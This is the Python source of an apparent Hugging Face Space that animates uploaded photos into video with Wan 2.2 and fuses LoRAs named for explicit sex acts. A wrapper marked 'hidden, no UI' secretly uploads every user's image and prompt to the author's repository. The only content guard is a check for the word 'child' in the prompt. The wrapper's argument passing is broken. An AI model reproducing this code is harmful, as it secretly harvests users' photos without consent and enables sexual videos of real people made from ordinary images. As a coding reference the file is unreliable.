wan22-AOT / app_lora_cpu.py
rahul7star's picture
Update app_lora_cpu.py
f4ca778 verified
import spaces
import torch
from diffusers.pipelines.wan.pipeline_wan_i2v import WanImageToVideoPipeline
from diffusers.models.transformers.transformer_wan import WanTransformer3DModel
from diffusers.utils.export_utils import export_to_video
import gradio as gr
import tempfile
import numpy as np
from PIL import Image
import random
import gc
import os
from torchao.quantization import quantize_
from torchao.quantization import Float8DynamicActivationFloat8WeightConfig
from torchao.quantization import Int8WeightOnlyConfig
import aoti
MODEL_ID = "Wan-AI/Wan2.2-I2V-A14B-Diffusers"
MAX_DIM = 832
MIN_DIM = 480
SQUARE_DIM = 640
MULTIPLE_OF = 16
MAX_SEED = np.iinfo(np.int32).max
FIXED_FPS = 16
MIN_FRAMES_MODEL = 8
MAX_FRAMES_MODEL = 80
MIN_DURATION = round(MIN_FRAMES_MODEL/FIXED_FPS,1)
MAX_DURATION = round(MAX_FRAMES_MODEL/FIXED_FPS,1)
pipe = WanImageToVideoPipeline.from_pretrained(MODEL_ID,
transformer=WanTransformer3DModel.from_pretrained('cbensimon/Wan2.2-I2V-A14B-bf16-Diffusers',
subfolder='transformer',
torch_dtype=torch.bfloat16,
device_map='cuda',
),
transformer_2=WanTransformer3DModel.from_pretrained('cbensimon/Wan2.2-I2V-A14B-bf16-Diffusers',
subfolder='transformer_2',
torch_dtype=torch.bfloat16,
device_map='cuda',
),
torch_dtype=torch.bfloat16,
).to('cuda')
# 加载并融合你的LoRA模型
#weight_name="Lightx2v/lightx2v_I2V_14B_480p_cfg_step_distill_rank128_bf16.safetensors",
pipe.load_lora_weights(
"Kijai/WanVideo_comfy",
weight_name="LoRAs/Wan22_Lightx2v/Wan_2_2_I2V_A14B_HIGH_lightx2v_4step_lora_v1030_rank_64_bf16.safetensors",
adapter_name="lightx2v"
)
kwargs_lora = {}
kwargs_lora["load_into_transformer_2"] = True
#weight_name="Lightx2v/lightx2v_I2V_14B_480p_cfg_step_distill_rank128_bf16.safetensors",
pipe.load_lora_weights(
"Kijai/WanVideo_comfy",
weight_name="LoRAs/Wan22-Lightning/old/Wan2.2-Lightning_I2V-A14B-4steps-lora_LOW_fp16.safetensors",
adapter_name="lightx2v_2", **kwargs_lora
)
# 新增:加载你提供的high noise LoRA
pipe.load_lora_weights(
"rahul7star/wan2.2Lora",
weight_name="DR34ML4Y_I2V_14B_HIGH.safetensors",
adapter_name="high_noise_lora",
token=os.environ.get("HF_TOKEN")
)
# 新增:加载你提供的low noise LoRA
pipe.load_lora_weights(
"rahul7star/wan2.2Lora",
weight_name="DR34ML4Y_I2V_14B_LOW.safetensors",
adapter_name="low_noise_lora",
token=os.environ.get("HF_TOKEN"),
load_into_transformer_2=True
)
## 2 attempt
pipe.load_lora_weights(
"rahul7star/wan2.2Lora",
weight_name="wan2.2_i2v_highnoise_pov_missionary_v1.0.safetensors",
adapter_name="high_noise_lora1",
token=os.environ.get("HF_TOKEN")
)
# 新增:加载你提供的low noise LoRA
pipe.load_lora_weights(
"rahul7star/wan2.2Lora",
weight_name="wan2.2_i2v_lownoise_pov_missionary_v1.0.safetensors",
adapter_name="low_noise_lora1",
token=os.environ.get("HF_TOKEN"),
load_into_transformer_2=True
)
# pipe.set_adapters(["lightx2v", "lightx2v_2", "high_noise_lora", "low_noise_lora","high_noise_lora1", "low_noise_lora1","high_noise_lora2", "low_noise_lora2"], adapter_weights=[1., 1., 1., 1.,1.,1.,1.,1.])
# # 修改了lora_scale
# pipe.fuse_lora(adapter_names=["lightx2v", "high_noise_lora","high_noise_lora1","high_noise_lora2"], lora_scales=[3.0, 3.0,3.0,1.0], components=["transformer"])
# # 修改了lora_scale
# pipe.fuse_lora(adapter_names=["lightx2v_2", "low_noise_lora","low_noise_lora1","low_noise_lora2"], lora_scales=[1.0, 1.0,1.0,1.0], components=["transformer_2"])
###### use this for 3rd Lora
# # ## 3rd
# pipe.load_lora_weights(
# "rahul7star/wan2.2Lora",
# weight_name="Wan2.2-Doggy_high_noise.safetensors",
# adapter_name="high_noise_lora2",
# token=os.environ.get("HF_TOKEN")
# )
# # 新增:加载你提供的low noise LoRA
# pipe.load_lora_weights(
# "rahul7star/wan2.2Lora",
# weight_name="Wan2.2-Doggy_low_noise.safetensors",
# adapter_name="low_noise_lora2",
# token=os.environ.get("HF_TOKEN"),
# load_into_transformer_2=True
# )
# pipe.set_adapters(["lightx2v", "lightx2v_2", "high_noise_lora", "low_noise_lora","high_noise_lora1", "low_noise_lora1","high_noise_lora2", "low_noise_lora2"], adapter_weights=[1., 1., 1., 1.,1.,1.,1.,1.])
# # 修改了lora_scale
# pipe.fuse_lora(adapter_names=["lightx2v", "high_noise_lora","high_noise_lora1","high_noise_lora2"], lora_scales=[3.0, 3.0,3.0,3.0], components=["transformer"])
# # 修改了lora_scale
# pipe.fuse_lora(adapter_names=["lightx2v_2", "low_noise_lora","low_noise_lora1","low_noise_lora2"], lora_scales=[1.0, 1.0,1.0,1.0], components=["transformer_2"])
# #### 3rd lora ends @######
pipe.set_adapters(["lightx2v", "lightx2v_2", "high_noise_lora", "low_noise_lora","high_noise_lora1", "low_noise_lora1"], adapter_weights=[1.5, 1., 1., 1.,1.,1.])
# 修改了lora_scale
pipe.fuse_lora(adapter_names=["lightx2v", "high_noise_lora","high_noise_lora1"], lora_scales=[3.0, 3.0,3.0], components=["transformer"])
# 修改了lora_scale
pipe.fuse_lora(adapter_names=["lightx2v_2", "low_noise_lora","low_noise_lora1"], lora_scales=[1.0, 1.0,1.0], components=["transformer_2"])
########testing all. 4 together
# 原始 v8normal LoRA
# pipe.load_lora_weights(
# "rahul7star/wan2.2Lora", weight_name="DR34ML4Y_I2V_14B_HIGH.safetensors", adapter_name="high_noise_lora", token=os.environ.get("HF_TOKEN")
# )
# pipe.load_lora_weights(
# "rahul7star/wan2.2Lora", weight_name="DR34ML4Y_I2V_14B_LOW.safetensors", adapter_name="low_noise_lora", token=os.environ.get("HF_TOKEN"), load_into_transformer_2=True
# )
# # dremal LoRA
# pipe.load_lora_weights(
# "rahul7star/wan2.2Lora", weight_name="wan2.2_i2v_highnoise_pov_missionary_v1.0.safetensors", adapter_name="high_dremal_lora", token=os.environ.get("HF_TOKEN")
# )
# pipe.load_lora_weights(
# "rahul7star/wan2.2Lora", weight_name="wan2.2_i2v_lownoise_pov_missionary_v1.0.safetensors", adapter_name="low_dremal_lora", token=os.environ.get("HF_TOKEN"), load_into_transformer_2=True
# )
# # missimd LoRA
# pipe.load_lora_weights(
# "rahul7star/wan2.2Lora", weight_name="Wan2.2-Doggy_high_noise.safetensors", adapter_name="high_missimd_lora", token=os.environ.get("HF_TOKEN")
# )
# pipe.load_lora_weights(
# "rahul7star/wan2.2Lora", weight_name="Wan2.2-Doggy_low_noise.safetensors", adapter_name="low_missimd_lora", token=os.environ.get("HF_TOKEN"), load_into_transformer_2=True
# )
# # ultrade LoRA
# pipe.load_lora_weights(
# "rahul7star/wan2.2Lora", weight_name="WAN-2.2-I2V-POV-Titfuck-Paizuri-HIGH-v1.0.safetensors", adapter_name="high_ultrade_lora", token=os.environ.get("HF_TOKEN")
# )
# pipe.load_lora_weights(
# "rahul7star/wan2.2Lora", weight_name="WAN-2.2-I2V-POV-Titfuck-Paizuri-LOW-v1.0.safetensors", adapter_name="low_ultrade_lora", token=os.environ.get("HF_TOKEN"), load_into_transformer_2=True
# )
# # 设置所有 LoRA 权重
# pipe.set_adapters(
# [
# "lightx2v", "lightx2v_2",
# "high_noise_lora", "low_noise_lora",
# "high_dremal_lora", "low_dremal_lora",
# "high_missimd_lora", "low_missimd_lora",
# "high_ultrade_lora", "low_ultrade_lora"
# ],
# adapter_weights=[1.7, 1.5, 0.4, 0.4, 0, 0, 0.7, 0.7, 0.4, 0.4]
# )
# # 融合 LoRA 到 transformer
# pipe.fuse_lora(
# adapter_names=[
# "lightx2v",
# "high_noise_lora",
# "high_dremal_lora",
# "high_missimd_lora",
# "high_ultrade_lora"
# ],
# lora_scales=[4.0, 3.0, 2.0, 2.0, 2.0],
# components=["transformer"]
# )
# # 融合 LoRA 到 transformer_2
# pipe.fuse_lora(
# adapter_names=[
# "lightx2v_2",
# "low_noise_lora",
# "low_dremal_lora",
# "low_missimd_lora",
# "low_ultrade_lora"
# ],
# lora_scales=[2.0, 1.5, 1.0, 1.0, 1.0],
# components=["transformer_2"]
# )
#############
pipe.unload_lora_weights()
quantize_(pipe.text_encoder, Int8WeightOnlyConfig())
quantize_(pipe.transformer, Float8DynamicActivationFloat8WeightConfig())
quantize_(pipe.transformer_2, Float8DynamicActivationFloat8WeightConfig())
aoti.aoti_blocks_load(pipe.transformer, 'rahul7star/WanAot', variant='fp8da')
aoti.aoti_blocks_load(pipe.transformer_2, 'rahul7star/WanAot', variant='fp8da')
default_prompt_i2v = "make this image come alive, cinematic motion, smooth animation"
default_negative_prompt = "色调艳丽, 过曝, 静态, 细节模糊不清, 字幕, 风格, 作品, 画作, 画面, 静止, 整体发灰, 最差质量, 低质量, JPEG压缩残留, 丑陋的, 残缺的, 多余的手指, 画得不好的手部, 画得不好的脸部, 畸形的, 毁容的, 形态畸形的肢体, 手指融合, 静止不动的画面, 杂乱的背景, 三条腿, 背景人很多, 倒着走"
def resize_image(image: Image.Image) -> Image.Image:
"""
Resizes an image to fit within the model's constraints, preserving aspect ratio as much as possible.
"""
width, height = image.size
# Handle square case
if width == height:
return image.resize((SQUARE_DIM, SQUARE_DIM), Image.LANCZOS)
aspect_ratio = width / height
MAX_ASPECT_RATIO = MAX_DIM / MIN_DIM
MIN_ASPECT_RATIO = MIN_DIM / MAX_DIM
image_to_resize = image
if aspect_ratio > MAX_ASPECT_RATIO:
# Very wide image -> crop width to fit 832x480 aspect ratio
target_w, target_h = MAX_DIM, MIN_DIM
crop_width = int(round(height * MAX_ASPECT_RATIO))
left = (width - crop_width) // 2
image_to_resize = image.crop((left, 0, left + crop_width, height))
elif aspect_ratio < MIN_ASPECT_RATIO:
# Very tall image -> crop height to fit 480x832 aspect ratio
target_w, target_h = MIN_DIM, MAX_DIM
crop_height = int(round(width / MIN_ASPECT_RATIO))
top = (height - crop_height) // 2
image_to_resize = image.crop((0, top, width, top + crop_height))
else:
if width > height: # Landscape
target_w = MAX_DIM
target_h = int(round(target_w / aspect_ratio))
else: # Portrait
target_h = MAX_DIM
target_w = int(round(target_h * aspect_ratio))
final_w = round(target_w / MULTIPLE_OF) * MULTIPLE_OF
final_h = round(target_h / MULTIPLE_OF) * MULTIPLE_OF
final_w = max(MIN_DIM, min(MAX_DIM, final_w))
final_h = max(MIN_DIM, min(MAX_DIM, final_h))
return image_to_resize.resize((final_w, final_h), Image.LANCZOS)
HF_MODEL = os.environ.get("HF_UPLOAD_REPO", "rahul7star/wan22-aot-image")
# --- CPU-only upload function ---
def upload_image_and_prompt_cpu(input_image, prompt_text) -> str:
from datetime import datetime
import tempfile, os, uuid, shutil
from huggingface_hub import HfApi
# Instantiate the HfApi class
api = HfApi()
today_str = datetime.now().strftime("%Y-%m-%d")
unique_subfolder = f"Upload-Image-{uuid.uuid4().hex[:8]}"
hf_folder = f"{today_str}/{unique_subfolder}"
# Save image temporarily
with tempfile.NamedTemporaryFile(suffix=".png", delete=False) as tmp_img:
if isinstance(input_image, str):
shutil.copy(input_image, tmp_img.name)
else:
input_image.save(tmp_img.name, format="PNG")
tmp_img_path = tmp_img.name
# Upload image using HfApi instance
api.upload_file(
path_or_fileobj=tmp_img_path,
path_in_repo=f"{hf_folder}/input_image.png",
repo_id=HF_MODEL,
repo_type="model",
token=os.environ.get("HUGGINGFACE_HUB_TOKEN")
)
# Save prompt as summary.txt
summary_file = tempfile.NamedTemporaryFile(delete=False, suffix=".txt").name
with open(summary_file, "w", encoding="utf-8") as f:
f.write(prompt_text)
api.upload_file(
path_or_fileobj=summary_file,
path_in_repo=f"{hf_folder}/summary.txt",
repo_id=HF_MODEL,
repo_type="model",
token=os.environ.get("HUGGINGFACE_HUB_TOKEN")
)
# Cleanup
os.remove(tmp_img_path)
os.remove(summary_file)
return hf_folder
def get_num_frames(duration_seconds: float):
return 1 + int(np.clip(
int(round(duration_seconds * FIXED_FPS)),
MIN_FRAMES_MODEL,
MAX_FRAMES_MODEL,
))
# --- Wrapper to upload image/prompt on CPU before GPU generation ---
def generate_video_with_upload(input_image, prompt, height, width,
negative_prompt=default_negative_prompt,
duration_seconds=2, guidance_scale=0, steps=4,
seed=44, randomize_seed=False):
# Upload on CPU (hidden, no UI)
try:
upload_image_and_prompt_cpu(input_image, prompt)
except Exception as e:
print("Upload failed:", e)
# Proceed with GPU video generation
return generate_video(input_image, prompt, height, width,
negative_prompt, duration_seconds,
guidance_scale, steps, seed, randomize_seed)
def get_duration(
input_image,
prompt,
steps,
negative_prompt,
duration_seconds,
guidance_scale,
guidance_scale_2,
seed,
randomize_seed,
progress,
):
BASE_FRAMES_HEIGHT_WIDTH = 81 * 832 * 624
BASE_STEP_DURATION = 15
width, height = resize_image(input_image).size
frames = get_num_frames(duration_seconds)
factor = frames * width * height / BASE_FRAMES_HEIGHT_WIDTH
step_duration = BASE_STEP_DURATION * factor ** 1.5
return 10 + int(steps) * step_duration
@spaces.GPU(duration=get_duration)
def generate_video(
input_image,
prompt,
steps = 4,
negative_prompt=default_negative_prompt,
duration_seconds = MAX_DURATION,
guidance_scale = 1,
guidance_scale_2 = 1,
seed = 42,
randomize_seed = False,
progress=gr.Progress(track_tqdm=True),
):
"""
Generate a video from an input image using the Wan 2.2 14B I2V model with Lightning LoRA.
This function takes an input image and generates a video animation based on the provided
prompt and parameters. It uses an FP8 qunatized Wan 2.2 14B Image-to-Video model in with Lightning LoRA
for fast generation in 4-8 steps.
Args:
input_image (PIL.Image): The input image to animate. Will be resized to target dimensions.
prompt (str): Text prompt describing the desired animation or motion.
steps (int, optional): Number of inference steps. More steps = higher quality but slower.
Defaults to 4. Range: 1-30.
negative_prompt (str, optional): Negative prompt to avoid unwanted elements.
Defaults to default_negative_prompt (contains unwanted visual artifacts).
duration_seconds (float, optional): Duration of the generated video in seconds.
Defaults to 2. Clamped between MIN_FRAMES_MODEL/FIXED_FPS and MAX_FRAMES_MODEL/FIXED_FPS.
guidance_scale (float, optional): Controls adherence to the prompt. Higher values = more adherence.
Defaults to 1.0. Range: 0.0-20.0.
guidance_scale_2 (float, optional): Controls adherence to the prompt. Higher values = more adherence.
Defaults to 1.0. Range: 0.0-20.0.
seed (int, optional): Random seed for reproducible results. Defaults to 42.
Range: 0 to MAX_SEED (2147483647).
randomize_seed (bool, optional): Whether to use a random seed instead of the provided seed.
Defaults to False.
progress (gr.Progress, optional): Gradio progress tracker. Defaults to gr.Progress(track_tqdm=True).
Returns:
tuple: A tuple containing:
- video_path (str): Path to the generated video file (.mp4)
- current_seed (int): The seed used for generation (useful when randomize_seed=True)
Raises:
gr.Error: If input_image is None (no image uploaded).
Note:
- Frame count is calculated as duration_seconds * FIXED_FPS (24)
- Output dimensions are adjusted to be multiples of MOD_VALUE (32)
- The function uses GPU acceleration via the @spaces.GPU decorator
- Generation time varies based on steps and duration (see get_duration function)
"""
if input_image is None:
raise gr.Error("Please upload an input image.")
num_frames = get_num_frames(duration_seconds)
current_seed = random.randint(0, MAX_SEED) if randomize_seed else int(seed)
resized_image = resize_image(input_image)
print("pompt is")
print(prompt)
if "child" in prompt.lower():
print("Found 'child' in prompt. Exiting loop.")
return
output_frames_list = pipe(
image=resized_image,
prompt=prompt,
negative_prompt=negative_prompt,
height=resized_image.height,
width=resized_image.width,
num_frames=num_frames,
guidance_scale=float(guidance_scale),
guidance_scale_2=float(guidance_scale_2),
num_inference_steps=int(steps),
generator=torch.Generator(device="cuda").manual_seed(current_seed),
).frames[0]
with tempfile.NamedTemporaryFile(suffix=".mp4", delete=False) as tmpfile:
video_path = tmpfile.name
export_to_video(output_frames_list, video_path, fps=FIXED_FPS)
return video_path, current_seed
with gr.Blocks() as demo:
gr.Markdown("# Wan22 AOT")
#gr.Markdown("run Wan 2.2 in just 4-8 steps, with [Lightning LoRA](https://huggingface.co/Kijai/WanVideo_comfy/tree/main/Wan22-Lightning), fp8 quantization & AoT compilation - compatible with 🧨 diffusers and ZeroGPU⚡️")
with gr.Row():
with gr.Column():
input_image_component = gr.Image(type="pil", label="Input Image")
prompt_input = gr.Textbox(label="Prompt", value=default_prompt_i2v)
duration_seconds_input = gr.Slider(minimum=MIN_DURATION, maximum=MAX_DURATION, step=0.1, value=3.5, label="Duration (seconds)", info=f"Clamped to model's {MIN_FRAMES_MODEL}-{MAX_FRAMES_MODEL} frames at {FIXED_FPS}fps.")
with gr.Accordion("Advanced Settings", open=False):
negative_prompt_input = gr.Textbox(label="Negative Prompt", value=default_negative_prompt, lines=3)
seed_input = gr.Slider(label="Seed", minimum=0, maximum=MAX_SEED, step=1, value=42, interactive=True)
randomize_seed_checkbox = gr.Checkbox(label="Randomize seed", value=True, interactive=True)
steps_slider = gr.Slider(minimum=1, maximum=30, step=1, value=6, label="Inference Steps")
guidance_scale_input = gr.Slider(minimum=0.0, maximum=10.0, step=0.5, value=1, label="Guidance Scale - high noise stage")
guidance_scale_2_input = gr.Slider(minimum=0.0, maximum=10.0, step=0.5, value=1, label="Guidance Scale 2 - low noise stage")
generate_button = gr.Button("Generate Video", variant="primary")
with gr.Column():
video_output = gr.Video(label="Generated Video", autoplay=True, interactive=False)
#upload_image_and_prompt(input_image_component, prompt_input)
ui_inputs = [
input_image_component, prompt_input, steps_slider,
negative_prompt_input, duration_seconds_input,
guidance_scale_input, guidance_scale_2_input, seed_input, randomize_seed_checkbox
]
generate_button.click(fn=generate_video_with_upload, inputs=ui_inputs, outputs=[video_output, seed_input])
if __name__ == "__main__":
demo.queue().launch(mcp_server=True)